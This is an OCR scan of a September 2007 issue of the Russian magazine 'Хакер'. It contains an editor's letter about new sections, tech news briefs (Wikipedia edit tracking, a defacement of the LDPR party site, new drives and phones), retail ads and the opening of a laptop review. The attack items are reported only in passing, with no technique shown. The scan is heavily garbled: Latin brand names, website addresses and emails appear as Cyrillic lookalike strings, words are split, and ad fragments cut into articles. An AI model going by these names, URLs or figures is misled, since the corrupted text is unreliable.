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Новая скорость, 
новые возможности. 




Многофункциональный домашний компьютер 




Счастливые обладатели компьютера СіагШазіег 
Мадпит ЕХЕ на базепроцессора Іпіеі® Соге™2 ОиасІ 
не теряют времени зря. Они работают с различными 
программами, рисуют, изучают языки, играют, разви- 
вают математические способности и обучаются мно- ЗІагШазІег Маупііш ЕХЕ С20 6600 

гим ДРУГИМ полезным вещам ! Іпіеі® Соге™2 ОиасІ 06600/1 Г6/250Г6/86006Т 256Мб/500ММ)±РѴѴ 




Необходимые аксессуары для компьютера 




Принтер/сканер/копир 
в одном устройстве 



МФУ 

НР Ое$кіе( Р380 

4800x1 200сІрі/20стр/мин(ч/6)/ 
14стр/мин(цв)/ІІЗВ 2.0 




ШИ* 




Веб-камера 
ЬодНесИ ШііскСаш Со 

640х480Пикс/до 30 кадров в секунду/ІІ5В 




Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Ьодо, Соге Іпзісіе, Іпіеі, Іпіеі І_одо, Іпіеі Соге, Іпіеі Іпзісіе, Іпіеі Іпзібе І_одо, Іпіеі Ѵііѵ, Іпіеі ѵРго, Ііапіит, Ііапіит Іпзібе, Репііит, Репііит Іпзібе, Хеоп, и Хеоп Іпзібе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые 
принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 




Сеть магазинов цифровой электроники СтартМастер: 



Москва > Московская область > Санкт-Петербург 
Ростов-на-Дону > Новосибирск > Новокузнецк > Барнаул 
Кемеровская область =■ Алтайский край 

Адреса магазинов уточняйте на ѵѵѵѵѵѵ.зіагітазіег.ги или по телефону единой справочной. 



на в е @ «а 



звонок бесплатный 

8-800-555-8555 



ууѵѵѵѵ.зіагітавіег.ги 

іп1о@зіагІтазІег.ги 



ИНТЕРНЕТ - МАГАЗИН 

ѵѵѵѵѵѵ.зт.ги 



Большой выбор компьютеров, ноутбуков, фото- и видеотехники, телевизоров, трЗ, мобильных телефонов. 



реклама Цены дейтвительны на 16.09.2007. *Цена указана на системный блок. 










После того как Кіі прочитал 
статью Длинного про про- 
слушку соседей в этом номере, 
его жизнь поменялась. Фарс 
судьбы: баклан самодельным 
девайсом за 30 рублей прослу- 
шивает соседа — майора МВД. 



НУ ЧТО, У МЕНЯ МНОГО ХОРОШИХ НОВОСТЕЙ. С ЭТОГО НОМЕРАУ НАС СТАРТУЕТ МАСШТАБНОЕ 
ОБНОВЛЕНИЕ. 



Первым делом 



у хочу обрадовать любителей лома и паяльника: фрикерские штуки теперь у нас существуют в форма- 
те отдельной рубрики и каждый месяц независимо ни отчего Длинный будет делать для тебя по 2-3 интересные 
статьи с самыми долбанутыми опытами, неожиданными результатами и сногсшибательными девайсами. 



Пункт второй 



у — это рубрика РзусЬо. Психика человека — невероятно сложная система, и для хакерского журнала 

непростительно было бы не писать о взломе человеческих мозгов и протекающих в нем процессов. Всежетак 
интересно и красиво! С этого номера каждый месяц читай о самых необычных свойствах нашей психики и методах, 
с помощью которых ей можно управлять. 



Пункттретий 



]— это йѴО. Так получилось, что мы достаточно долго не меняли нашу оболочку, и она у нас морально 

устарела. Открою тайну: уже несколько месяцев мы по ночам занимаемся тайными разработками новой дисковой 
оболочки. И теперь рады представить тебе результат с пометкой Веіа: ѵѵеЬ2-ориентированную оболочку с переде- 
ланным дизайном, удобным поиском, облаком тэгов и еще кучей добавлений, которые очень скоро найдут там свое 
место. 



Под четвертым пунктом 



]у меня стоит важная вещь. Хакер — народный журнал, и нам нужны ТВОИ идеи. Идеи о 

том, что бы стоило поменять вжурнале. Вотвозьми этотномер и, если во время чтенияты поймешь, что тебя что-то 
раздражает, тебе чего-то не хватает или ты вообще хотел бы что-то серьезно изменить, немедленно присылай 
свои соображения на геІоасКЗгеаІ.хакер.ги. Будем обновляться, и не сомневайся — ни одно сообщение не будет 
пропущено. 



пікііогг, главред ][ 
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'Обо всем за последний меся 




15 августа проекту Споте исполнилось 



10ЛЕТ 




ѴѴікіресІіа для всех 

Онлайн-энциклопедия ѴѴікіргсІіа известна, наверное, практически всем 
пользователям Сети. В ней всегда можно найти информацию по интере- 
сующему вопросу, а также добавить свою статью или отредактировать 
чужую. С последним пунктом и происходят интересные вещи... Для 
отслеживания изменений в энциклопедии был создан ресурс ѴѴікіресІіа 
Зсаппег, запоминающий ІР-адрес, с которого эти изменения произво- 
дятся. Как выяснилось, одними из самых заядлых редакторов являются 
политики ЦРУ США. Ну тут все понятно: политическую информацию 
грех не поредактировать — можно полить грязью конкурентов, скрыть 
некоторые подробности о войне в Ираке и т.п. Также в списках редакто- 
ров числятся такие компании, как Арріе, МісгозоЙ и Ве\\. Арріе добавила 
негативные комментарии о Місгозоіі, приписав себе лестные. Иеіі 
удаляет высказывания пользователей о плохой работе служб техниче- 
ской поддержки и об условиях труда в странах третьего мира, а Місгозоіі: 
конкретно правит число поломок в приставке ХЪох 360. В общем, бардак 
в этой вашей ѴѴікіресІіа... 



Формату Сошрасс Бізс исполнилось 25 ЛЕТ .За все время его 
существования было продано более 200 миллиардов дисков. 



Объемная 

книжка 



Сколько бы ни было свободного места на жестком диске, а 
все равно оно довольно быстро заканчивается. Даже если 
использовать для хранения данных внешние жесткие диски. 
Особенно остро проблема свободного места встала с появле- 
нием большого разнообразия фильмов НО-качества. Имен- 
но для любителей хранить огромное количество данных 
корпорация ѴѴезіегп Оі^йаі объявила об обновлении серии 
двухдисковых внешних накопителей Му Воок, которые 
теперь могут иметь максимальный объем до 2 Тб. Версии 
такого объема будут доступны в виде моделей Му ВоокѴѴогШ 
Ебійоп II, Му Воок Рго ЕсШоп II и Му Воок Ргешіиш Ебігіоп II . 
Причем первая из них позволит организовать простой защи- 
щенный доступ к данным, даже если локальный компьютер 
выключен. Если такая функция не нужна, то стоит обратить 
внимание на две другие модели, которые идеально подходят 
для резервного копирования и хранения огромного коли- 
чества данных. Если же тебя больше волнует сохранность 
твоих данных, то половину емкости можно выделить для 
зеркального копирования (то есть организовать КАЮ 1) . 




► 004 



ХАКЕР 09 /105/ 07 






С240 Е420 



Х830 



*■ '*Т- 



* «Привет, люди!» 



Купи в РИКСИС мобильный телефон 5ат$ипд С240, Е420 или Х830 

и получи гарантированный подарок. 

А еще у тебя есть шанс выиграть обучение иностранному языку за границей. 

Акция проводится только в магазинах РИКСИС в Москве и Санкт-Петербурге, с 27 августа по 30 сентября 2007 года 



единая справочная: 

( 495 ) 933 - 0-222 



подробности на сайте: 

ѵѵѵѵѵѵ.сііхіз.ги 



йИКСИС 

цисрроВая техника 



Товар сертифицирован. На правах рекламы 
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УоиТиЬе для ученых 

Если попробовать прочитать какую-нибудь научную работу, то с 
первого раза достаточно сложно разобраться в разнообразии научных 
терминов и специфических выражений. Та или иная исследователь- 
ская мысль воспринималась бы гораздо легче, если бы была проком- 
ментирована или даже проиллюстрирована самими учеными. Взяв эту 
идею за основу и объединив свои силы, Национальный научный фонд 
США, Публичная научная библиотека и Суперкомпьютерный центр 
Сан-Диего создали сервис ЗсіѴее С ѵ\гтѵ. зсіѵее Ту) , который в народе 
прозвали «УоиТиЬе для ученых». На сайт службы ученые загружают 
документы, видео- и аудиоролики, в которых описывают свою работу. 
Сервис поддерживает обсуждения материалов, создание сообществ 
по ключевым словам и другие полезные атрибуты. Теперь любой 
желающий может расширить кругозор или просто понтануться перед 
друзьями познаниями в такой области, о существовании которой они, 
вероятно, раньше даже и не подозревали :) . 



В России самые 

неорганизованные 

программисты 

Интересное исследование было проведено компанией НР и иссле- 
довательским подразделением НР апб гііе Есопотізі: ІШе11і§епсе Шіи 
(ЕШ) . Они выяснили, сколько ІТ-проектов завершается в срок в разных 
странах. Согласно результатам исследования, Россия находится на 
последнем месте: 

Швеция — 44% проектов были завершены точно в срок за последние 
3 года, 

Швейцария — 24%, 

Чехия — 20%, 

Германия — 19%, 

Дания — 16%, 

Великобритания — 11%, 

Израиль — 8%, 

Финляндия — 8%, 

Франция — 6%, 

Бельгия — 4%, 

Испания — 4%, 

Италия — 4%, 

Нидерланды — 4%, 

Россия — 4%. 

Справедливости ради стоит отметить, что на самом последнем месте 
Россия стоит только потому, что имеющие одинаково плохой результат 
страны отсортированы по алфавиту, хотя лучше от этого все равно не 
становится. В поддержку отечественных программистов можно сказать, 
причины столь низкого процента завершенных вовремя проектов кро- 
ются, скорее, не в их плохой работе, а в задержках аутсорсеров, в смене 
приоритетов в процессе разработки проекта и в слабой координации 
между менеджерами. 




БеЬіап Ііпих исполнилось 14 ЛЕТ. 




Деловая клава 

Компания ЗѴЕИ выпустила новый беспроводной набор для ценителей 
удобства и комфорта под названием ЗѴЕИ Согсііезз 9002, включающий 
клавиатуру и мышь бизнес-класса. Строгость внешнему виду набора 
придает прочный пластик серебристо-черного цвета. Клавиатура 
сочетает в себе компактность, функциональность и мобильность. 

104 основные и 10 дополнительных клавиш удобно располо- 
жены на панели размером всего 412 мм на 163 мм. До- 
полнительные кнопки позволяют получить 
быстрый доступ к приложениям 
для работы с мультимедиа, 
интернетом, электронной 
почтой и регулятором гром- 
кости. Мышка очень удобно 
лежит в руке, имеет 3 кнопки 
и колесико прокрутки. Помимо 
этого, в комплект входит ІІЗВ- 
подставка для мыши, в которой 
расположен приемопередатчик 
и зарядное устройство. Комплект 
умеет работать по 256 каналам, что 
существенно снижает вероятность 
пересечений с другими 
радиоустройствами. 
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Интернет там, 
где ты захочешь 

Тариф Онлайнер 

Стоимость 1 Мбайта 0РК5-Интернет от 2,35 руб. 



\ѵ\ѵ\ѵ.т{5.ги 

В пределах зоны покрытия СРВ5/Е0СЕ сети МТС. Зону покрытия СРВ5/Е0СЕ сети МТС уточняйте в контактном центре МТС 
по телефону 0890 (с мобильного телефона МТС звонки бесплатно) или в салонах-магазинах МТС. 

Цена указана в рублях с учетом налогов и действительна при подключенной услуге Ночной Интернет для абонентов г. Москвы 
и Московской области при нахождении на территории г. Москвы и Московской области. 
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Жопа для ЛДПР 




) 

П Ь 




В одно воскресное утро сайт Либе- 
рально-демократической партии 
России ( Члдлпллісірг.ги) полнил но- 
вое лицо, точнее, не совсем лицо. 
Неизвестные дефейснули главную 
страницу, украсив ее (если можно 
так выразиться) схематичным 
изображением задницы. Причем 
задница получилась плохо, и к 
ней добавили подпись «Жопа», окончательно отбрасывающую всякие 
сомнения. Кроме этой информации, была оставлена еще следующая 
надпись: «Ьа 1 0$Ьа НАскуои! ! ! Позаботьтесь о своей системе безопас- 
ности! ! ИисІеаг-ѴѴіпсІ Наск СКООР». Орфография оригинала сохра- 
нена полностью. В самой ЛДПР этот взлом рассматривают как некий 
политический демарш в преддверии выборов. Помимо этого, были 
также проведены атаки на сайты Российской объединенной демок- 
ратической партии «Яблоко» и московской молодежной организации 
«Молодежное Яблоко». Причем на сайт последней был еще и занесен 
вирус. Функционирование обоих сайтов было восстановлено за 
несколько дней. В отличие от ЛДПР, представители «Яблока» не видят 
в этих взломах политической подоплеки. И правильно — просто кто-то 
решил немного покуражиться :) . 




Дуй и говори 

Проблема зарядки мобильного телефона в 
походных условиях давно мучает любителей 
выбираться на природу. Сколько дополни- 
тельных аккумуляторов с собой не возьми, 
все равно в самый неподходящий момент все 
они разрядятся. Частично эта проблема реша- 
ется устройствами, позволяющими заряжать 
мобилы от солнечной энергии. Однако они 
все же более актуальны в солнечных странах. 
Разработчики постоянно ищут новые спосо- 
бы удовлетворения потребительского спроса 
в рассматриваемой области. Так, например, 
компания Огап^е планирует выпустить уст- 
ройство Огап^е МоЬіІе ѴѴіпсі СЬаг^ег, которое 
позволит заряжать мобильные телефоны, 
используя силу ветра. Правда, эффектив- 
ность такого устройства не очень высока 
— при скорости ветра 5 метров в секунду для 
зарядки одной батареи понадобятся целые 
сутки. Но с этим гаджетом можно проделать 
фокус, который с солнечными батареями не 
сработает: если нет ветра, телефон разряжен, 
а поговорить очень нужно, тебя могут спасти 
твои верные друзья, если будут усиленно дуть 
на устройство, пытаясь выработать доста- 
точно энергии для поддержания разговора. 
Причем чем больше друзей примет в этом 
участие, тем на большую продолжительность 
разговора ты можешь рассчитывать :) . 






Только 25%) ЛЮДЕ И, скачавших 
Рігеіох, продолжают им пользоваться. И только 



50% вообще устанавливают 



скачивания. 



его после 



Зеленые и жесткие 

В последнее время стало очень модно бороться за защиту окружаю- 
щей среды. Многие звезды шоу-бизнеса и просто обычные люди 
начинают экономить воду, покупать экологически чистые продукты 
и т.п. Производители жестких дисков решили не отставать от модных 
тенденций — компания ѴѴезіегп Пі§па1 представила новые накопи- 
тели СгеепРошег с уменьшенным энергопотреблением. Накопители 
предназначены для настольных компьютеров, корпоративных 
систем, бытовой электроники и внешних накопителей и могут быть 
объемом от 320 Гб до 1 Тб. Низкое энергопотребление позволит 
экономить до 10 долларов в год на одном накопителе. Так, например, 
центр обработки данных, в котором используется 10 тысяч накопи- 
телей, может сэкономить на электроэнергии 100 тысяч долларов в 
год и сократить объем выбросов СО 2 на 600 метрических тонн, что 
равносильно исчезновению с дорог почти 400 автомобилей в год. Ин- 
тересно, а диски с такой технологией будут стоить дороже обычных? А 
то так и выигрыша может не получиться. . . 
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:ет доступен ближе к осени.І 




Первую лазерную клавиатуру нам представили еще несколько лет 
назад. Изначально идея очень хорошая: на стол ставится маленькое 
устройство, которое проецирует перед собой очертания клавиатуры 
и фиксирует нажатия. Кроме удивленных взглядов окружающих 
такое устройство еще и дает возможность не таскать вместе со своим 
КПК или смартфоном сравнимую с ними по размерам клавиатуру. Но 
после попыток печатать таким образом все разочарованно возвраща- 
лись к обычным устройствам. Даже если опустить тот факт, что нажа- 
тие не всегда определяется верно, печатать на столе совсем неудобно. 



Новая 

проекционная 

клава 

Но производители не отчаявшись решили не останавливаться на 
достигнутом, и компания Сеііиоп представила новую разработку в 
этой области под названием СЬ850. Клавиатура может подключаться 
посредством ІІЗВ или ВІиеЮогіі, оснащена новой технологией трех- 
мерного восприятия нажатий и специальным зуммером, который 
издает сигнал при нажатии кнопки. Устройство пока в продажу не по- 
ступило, но производители уже заверяют об удобстве работы с ним, 
хотя лично я сомневаюсь в перспективности подобных технологий. 



ашается за помощью в онлайновые сообщества. 



Неправильная 
реклама 

Соо§1е продолжает активно 
продвигать свою систему 
контекстной рекламы АбЗепзе. 

Но иногда методы работы этой 
системы нравятся далеко не всем. Так, недавно крупный американский 
авиаперевозчик Атегісап Аігііпез подал в суд на компанию Соо§1е, 
ссылаясь на нарушение прав на торговую марку. Оказалось, что название 
Атегісап Аігііпез присутствовало в системе АбЗепзе в качестве платного 
ключевого слова, которое переводило на сайты авиакомпаний-конкурен- 
тов. Подобное использование контекстной рекламы очень популярно в 
рунете, но выяснилось, что и американские компании грешат подобными 
техниками. В иске требуется запретить использование торговой марки 
без разрешения ее владельца и возместить материальный ущерб. Как 
окончится судебный процесс, в принципе, ясно уже сейчас, дело остается 
только за выяснением суммы ущерба. 



Новый боец на 
процессорном поле 

Все мы уже привыкли, что на рынке процессоров присутствуют два 
крупных игрока — Іпіеі и ААГО. Но в битву внезапно вмешалась до 
этого неизвестная компания Тііега со своим 64-ядерным процессором 
Ті1е64. Создатели заявляют, что по мощности он в 10 раз превосходит 
двуядерники Іпіеі Хеоп и в 40 раз — ЭЗР производства Техаз Іпзітитетз. 
Изготовлен процессор по 90-нм технологии и работает на частотах от 
600 до 1000 МГц. Главным его отличием от конкурентов является нали- 
чие коммутационного блока на каждом ядре, что позволяет последнему 
передавать данные на четыре соседних ядра. Каждое ядро способно 
перегонять 500 Гбит в секунду, что позволяет одновременно обраба- 
тывать до восьми видеопотоков стандартной четкости, либо 2 потока 
720р, либо один в формате 1080р. Применять процессор планируется в 
бытовой электронике, цифровых тюнерах, сетевых концентраторах и 
прочих устройствах. В дальнейшем компания собирается начать выпуск 
36-ядерной и 120-ядерной модификации чипа. А для домашних ПК все 
остается по-прежнему. . . 





Ожидается, что к 2010 году объем 



рынка рекламы в блогах вырастет до 



$300 МИЛЛИОНОВ! 
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ООО «Сеннхайзер Аудио» 
2-я Звенигородская ул., 13, стр. 43 
Россия, 123022, Москва 
ел.: (495) 229 37 01 , факс: (495) 229 37 02 
іп1о@зеппвеізегаисііо.сот 
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Свято место... 



Не прошло и нескольких лет, как сайт АПоГтрЗ. сот умер. 
Давление Штатов на Россию по поводу этого портала нако- 
нец-то одержало верх. Ходят слухи, что к закрытию магазина 
имеют непосредственное отношение люди из Кремля. Вла- 
дельцы сайта до сих пор пытаются отстоять свою позицию, 
утверждая, что никаких законов РФ они не нарушали. Но 
тем не менее сайт уже продолжительное время не функцио- 
нирует. Искоренить музыкальное пиратство закрытием од- 
ного сайта невозможно — последователей предостаточно, и 
постоянно появляются новые. Одним из них является ресурс 
трЗайа.сот, который не только продает музыкальные ком- 
позиции, но и раздает их бесплатно. Чтобы, не потратив де- 
нег, загрузить нужный трек, необходимо в течение минуты 
смотреть на рекламный баннер. Надо сказать, что подобная 
идея давно висела в воздухе и вот наконец получила вполне 
достойную реализацию. 




Каждый 



4-И 



американец за год не прочитал ни одной книги. 



Поисковое кино 




Все мы привыкли, что в основу фильмов ложатся события различных 
художественных произведений, компьютерных игр, комиксов, других 
фильмов, возможно, какие-то исторические события. Но фильм о по- 
исковой системе — это что-то новое. 38-летний житель Лос-Анджелеса 
Джим Киллин (Лт КШееп) снял фильм под названием Соо§1е Ме («Най- 
ди меня»), в котором рассказывается о поисковой системе, ее возмож- 
ностях и сервисах. Как-то Джим сидел в интернете и случайно нагуглил 
семерых своих полных тезок со всего мира. Именно это подтолкнуло 
его к созданию документального фильма. Какая, собственно, связь 
между фильмом и тезками, никто сначала не понял, но автор объяснил, 



что «фильм создавался с целью пробудить в пользователях интернета 
желание найти своих однофамильцев». В данный момент идет монтаж 
ленты, но в недоработанном виде ее уже можно посмотреть на сайте 
автора: ѵ\л/\л/\луооу1етеШетоѵіе.сот . Да, и если ты думаешь, что узна- 
ешь из фильма что-то новое и интересное о поисковике, то лучше не 
трать на него свое время — в картине человек рассказывает, как вбил в 
поисковик свое имя и что случилось дальше. 



► 012 
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Широкоэкранный 

стиляга 



В Россию начинаются поставки широкоэкранного мони- 
тора Зат$ип§ 2032ВѴѴ, который был удостоен престижной 
международной награды ІР Эе$і§п Аѵѵагсі 2007. Стоит сразу 
отметить, что награду за дизайн этот монитор получил 
заслуженно — глянцево-черный монитор с обтекаемыми 
формами сразу притягивает к себе взгляд. Внешний вид 
также украшает отсутствие каких-либо винтов на поверх- 
ности. Интересно, что в подставке дисплея использован 
шарнир из новейшего материала — эластомера, обеспечи- 
вающий вращение и сборку. Это решение было отмечено 
международным жюри конкурса 2007 ІР МаЩгіаІ Аѵѵагсі зо- 
лотой медалью. Изображение ничем не уступает внешнему 
виду: четкость и насыщенность достигаются яркостью 
300 кд/м 2 и сверхвысокой контрастностью — 3000: 1. 
Технология Затзіт§Ма§ісВгі§1іі:3 позволяет достичь 
малого времени отклика — всего 2 мс, что даст возмож- 
ность комфортно смотреть динамичные фильмы и играть в 
игры. Монитор имеет диагональ 20 дюймов и разрешение 
1680x1050. 



Наполни мир 

эмоциями! 





5 ѴЕИ 5 РЗ -870 

■ Внешний блок усиления 
и коммутации 

• Вындд для пдд-ілюченкн 

наушников 

■ изящный Ні-Тесл дизайн 

* Пулы дистанционного 
управления 



ѵтм.&ѵеп.ги 

щварегч ИѵдаОйну. 

АдрчК 

Мл ЩШВШЕ -решишь 
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Стильная призма 

Иокіа представила новую серию мобильных телефонов под названи- 
ем Ргізт. Эта серия предназначена для людей, придающих большое 
значение стилю телефона. Неповторимый внешний вид достигается 
благодаря использованию уникальных цветов, материалов и графики. 
Телефоны отличаются острыми углами, формами, напоминающими 
огранку у бриллианта, и ориганальными клавиатурами. Серия вклю- 
чает в себя два аппарата — Иокіа 7900 Ргізт и Иокіа 7500 Ргізт. Первый 
отличает задняя аллюминиевая крышка с лазерной штамповкой, 49 
вариантов цветов подсветки дисплея с клавиатурой и экран из органиче- 
ских светодиодов на 16 миллионов цветов. Заставка на телефоне в тече- 
нии дня незаметно изменяется в зависимости от времени суток, заряда 
батареи и уровня сигнала. В комплекте идет внешняя карта памяти на 1 
Гб. 7500 легко узнать по полированному черному корпусу, украшенному 
сменной цветной полоской. В режиме воспроизведения музыки телефон 
может проработать до 9 часов от одного заряда батареи. В комплекте 
идет карточка на 2 Гб, на которую можно записать до 1500 песен. Оба те- 
лефона оснащены 2-мегапиксельными камерами и появятся в продаже в 
течение 3-го квартала 2007 года. 

.. .о 63% 



Інаходится в СТТТД] 
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Школьная форма 
с секретом 



В Великобритании родители школьников очень озабочены 

возможностью похищения их детей и в каждый момент 
времени хотят быть в курсе, где находится их чадо. 
Узнав об этом, компания Тгиіех, которая является одним 
из крупнейших поставщиков школьной формы, думает 
о том, чтобы оснастить всю форму встроенными СР$-пе- 
редатчиками. Пока компания рассматривает рыночные 
перспективы такой формы и подчеркивает, что повышен- 
ный интерес к такому способу слежения связан с недавним 
похищением трехлетней Маделейн Макканн. Что касаемо 
самих школьников, то треть из них одобрила подобный способ 
слежки за ними же. Видимо треть учащихся британских школ 
— ботаники, которые никогда эту школу не прогуливают. Но 
старшеклассники практически единогласно высказались против 
такой идеи, поскольку почуяли возможность быть глупо застукан- 
ными за распитием коки в парке вместо уроков как учителями, так и 
родителями. Подобными темпами схожие чипы начнут вставлять уже 
при рождении в памперсы и заставлять носить всю жизнь. . . 
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Скончался 

самый 

известный 

фрикер 

58-летний Джо Энгрессиа рое Еп^геззіа), самый известный 
и гениальный телефонный фрикер, легально сменивший 
свое имя на ІоуЪиЪЫез, скончался у себя дома в Миннеапо- 
лисе 8 августа. Джо играл одну из ведущих ролей в развитии 
субкультуры фрикинга. Еще в юном возрасте, в 70-х годах, 
он нашел способ бесплатно звонить по телефону, используя 
специальный свист. Его выгнали из университета Южной 
Флориды, после того как он открыл возможность неограни- 
ченно говорить из любой точки мира за $ 1 своим друзьям. 
За то, что он пытался всю жизнь оставаться пятилетним 
ребенком, Джо получил прозвище «Питер Пен телефонно- 
го взлома». У себя дома он хранил коллекцию плюшевых 
медведей и других игрушек, которые оставались с ним с 
самого его детства. Джо с рождения был слепым, а уровень 
его 1(2 удивлял многих — 172 единицы. Причина смерти 
пока выясняется. 
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Ваши способности . Наше вдохновение. 

МісюзоП 



отразить вторжение инопланетян 

просто. 



±. Соберите армию, вызовите флот и позвоните 
на канал Оі$соѵегу. 

Они всё знают. Они могут атаковать с воздуха и взять ситуацию 
под контроль, но потом проблемы будут и у вас, 
и у них. На них работают лучшие ученые, они 
владеют последними разработками, 
созданными как раз для таких целей. 

Может, они вам и помогут. Л 



2 . Украдите ключи от их корабля. 

Звучит безумно, но должно сработать. Когда они поймут, что застряли 
здесь, возможно, решат расслабиться и отдохнуть от завоеваний. 



І. Чихайте на них. 

Иммунная система пришельцев отличается от нашей. Значит, даже 

обычный насморк может стать для них смертельным. Чихайте 

и кашляйте в их сторону, плюйтесь во время разговора - 

даже если с иммунитетом у них все в порядке, 

они могут обидеться на грубость и улететь. А 



4 . Попробуйте договориться. (Или не пробуйте.) 

Может, они и не пришли к нам с миром, но все-таки это высокоразвитые существа 
Представьте, что они ваши клиенты, и продайте им идею, что человечество нужно 
беречь. Покажите презентацию на 50 слайдов, а затем заключите сделку. 

Или просто хватайте их за ноги и раскручивайте, пока не закружится голова. 



*>• Заморочьте им голову, а потом - бегите. 

Пришельцы не знают, кто тут главный. Скажите им, что 
на Земле правят белки, а люди - их покорные рабы. И пока 
они будут вести переговоры с белками, убегайте и прячьтесь. 



О. Все средства хороши. 

Никто вас не осудит, если драка будет нечестной. Против 
совершенного оружия и превосходящего интеллекта придется 
действовать другими методами. Не стесняйтесь использовать 
любые средства - царапаться, пинаться, кусаться, притворяться 
мертвым и даже дать пришельцу межгалактический щелбан. 



Реклама 




отразить атаку хакеров 
проще простого. 



Х« Внедрите МісгозоЛ Роге^гопі. 

Защищать вашу систему станет еще проще. Новое семейство продуктов 
информационной безопасности, включающее защиту периметра, клиентов 
и серверов (например, РогеРгопР БесигіРу Рог ЕхсІтапде Бегѵег), просто 
интегрировать и использовать. РогеРгопР поможет предупредить все 
угрозы безопасности проще, чем когда-либо. Чтобы узнать, как РогеРгопР 
помог защитить систему международного аэропорта Вены, посетите 
ѵѵѵѵѵѵ.ргозНергозіодо.ги 



МІСГОБО^® 

РогеРгопР 





Тнггигм 



АЛЕКСЕЙ ПОЛЯКОВ СЕРГЕЙ НИКИТИН 



КОМПЬЮТЕР 

В ДОРОГУ! 



СПИСОК ТЕСТИРУЕМОГО 
ОБОРУДОВАНИЯ 

Оезіеп СуЬегВоок 5843 

М5І МЕ6АВ00К РП200 

М5І МЕ6АВ00К РП31 0 

Поѵег ПоѵегВоок Ыаѵідаіог VI ООѴѴН 

5опу ѴАІО Ѵ6ІМ-СП1 1 5/ѴѴ 

ТозЫЬа ЗаІеІШе 11300 



СРАВНИТЕЛЬНОЕ ТЕСТИРОВАНИЕ ПОРТАТИВНЫХ НОУТБУКОВ 

В НАШ ВЕК КОМПЬЮТЕРНЫЕ ТЕХНОЛОГИИ УЖЕ НЕОТДЕЛИМЫ ОТ ПОВСЕДНЕВНОЙ 
ЖИЗНИ ЧЕЛОВЕКА. ВСЕГО ЛЕТ 15 НАЗАД ПОРТАТИВНЫМ КОМПЬЮТЕРОМ НАЗЫ- 
ВАЛСЯ ЗДОРОВЕННЫЙ ЛЭПТОП, КОТОРЫЙ, НЕМНОГО НАПРЯГШИСЬ, МОЖНО БЫЛО 
ВОЗИТЬ С СОБОЙ НА ОТНОСИТЕЛЬНО НЕБОЛЬШИЕ РАССТОЯНИЯ, ТЩАТЕЛЬНО СЛЕ- 
ДЯ ЗАТЕМ, ЧТОБЫ СЛУЧАЙНО НЕ «ПРИЛОЖИТЬ» ГДЕ-НИБУДЬ ХРУПКУЮ И ГРОМОЗ- 
ДКУЮ КОНСТРУКЦИЮ. ПОТОМ ПОЯВИЛИСЬ ПЕРВЫЕ НОУТБУКИ СТАНДАРТНЫХ ГАБА- 
РИТОВ, ПРИГОДНЫЕДЛЯ ЕЖЕДНЕВНЫХ ПУТЕШЕСТВИЙ. ЗАТЕМ НАСТУПИЛА ЭПОХА 
ВСЕОБЩЕЙ МИНИАТЮРИЗАЦИИ, ЛЭПТОПЫ И НОУТБУКИ ПЕРЕКОЧЕВАЛИ 
НАОФИСНЫЕСТОЛЫ.АИХ МЕСТО ПР0ЧН03АНЯЛИ КПК, КОММУНИКАТОРЫ И ПРО- 
ЧИЕ МИНИАТЮРНЫЕ ДЕВАЙСЫ. НО ЗА УМЕНЬШЕНИЕ РАЗМЕРОВ ПРИШЛОСЬ ПЛА- 
ТИТЬ И ГИБКОСТЬЮ, И УДОБСТВОМ, И ВОЗМОЖНОСТЯМИ. ВЗЯТЬХОТЯ БЫ ТО ОБ- 
СТОЯТЕЛЬСТВО, ЧТО НАБИВАТЬ БОЛЬШОЙ ТЕКСТ, ПОЛЬЗУЯСЬ СТИЛУСОМ ВМЕСТО 
КЛАВИАТУРЫ, КРАЙНЕ НЕУДОБНО. ПОЭТОМУ ЕСЛИ ТЕБЕ ПРИХОДИТСЯ МНОГО РАБО- 
ТАТЬ ЗА КОМПЬЮТЕРОМ, ТО, СКОРЕЕ ВСЕГО, ОТПРАВЛЯЯСЬ В ПОЕЗДКУ, ТЫ БУДЕШЬ 
БРАТЬС СОБОЙ НЕ КПК, АЛЕГКИЙ, НАДЕЖНЫЙ И КОМПАКТНЫЙ НОУТБУК. ВОЗМОЖ- 
НО, ОДИН ИЗ ТЕХ, КОТОРЫЕ МЫ ПРОТЕСТИРОВАЛИ. 



МЕТОДИКАТЕСТИРОВАНИЯ 

Главное в любом компьютере — это, разумеется, его производитель- 
ность. Ее мы оценивали с помощью программ ЗйМагк 2005, ЗйМагк 
2006, РСМагк 2004 и РСМагк 2005. Ксожалению, некоторые из них 
оказались несовместимы с ѴѴІпсіоѵѵб Ѵівіа, несмотря на все установлен- 
ные патчи; некоторые тесты зависали и из-за проблем с видеосистемой 
(ведь мощных графических плат в портативные ноутбуки, как правило, 
не ставят). 

Для создания более полной картины мы запускали тесты дважды — с 
питанием от сети и от батареи, переключаясь на соответствующий 
профиль питания (в последнем случае система обычно снижает 



производительность, чтобы уменьшить расход энергии). Поскольку вре- 
мя жизни аккумулятора компьютера в путешествии гораздо критичнее, 
чем таковое у настольного ноутбука, этому показателю мы также уделили 
большое внимание. Этот тест мы провели с помощью утилиты ВаШегу 
Еаіег Рго 2.7. 

Прогонялся также встроенный в ѴѴІп Ра г тест пропускной способности 
памяти. Температура во время всего процесса тестирования контрол и - 
роваласьутилитой Еѵегеві: ІШітаІе. Далеко не последние показатели 
для девайса, который значительную часть времени будет проводить 
на твоих коленях, — это удобство, компактность и эргономичность. Эти 
параметры тоже существенно повлияли на наши оценки. 



► 018 
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Технические характеристики: 

Процессор, ГГц: 1,8, ІпІеІСоге2 ОиоТббоо 

Память, Мб: 512 

Размер экрана, дюймы: 13,3 

Видеоплата, Мб: ІпІеІСМА950 

Жесткий диск, Гб: 100 

Оптический привод: 0Ѵ0-РѴѴ5ирегМииі 

Средства связи: модем, І_АІЧ, ѴѴі-Рі 

Интерфейсы: 115В, тіс,еаг, Ехргезз СагсІ, ѴСА, РігеѴѴіге, СОМ 

Габариты, мм: 312x257x37 
Вес, КГ: 2,6 

Этот защищенный ноутбук разработан в основном в расчете на людей 
экстремальных профессий, вынужденных работать в условиях высокой 
температуры и влажности, но будет полезен и просто в путешествии, 
в лесу, да и во всех местах, куда ты побоишься брать более хрупкую 
конструкцию. Экран девайса усилен ребрами жесткости, а клавиатура 
надежно защищена отводы и имеет специальные желобки для ее стока. 
Добавь кэтомуударостойкий корпус и ты поймешь, что этот неубивае- 
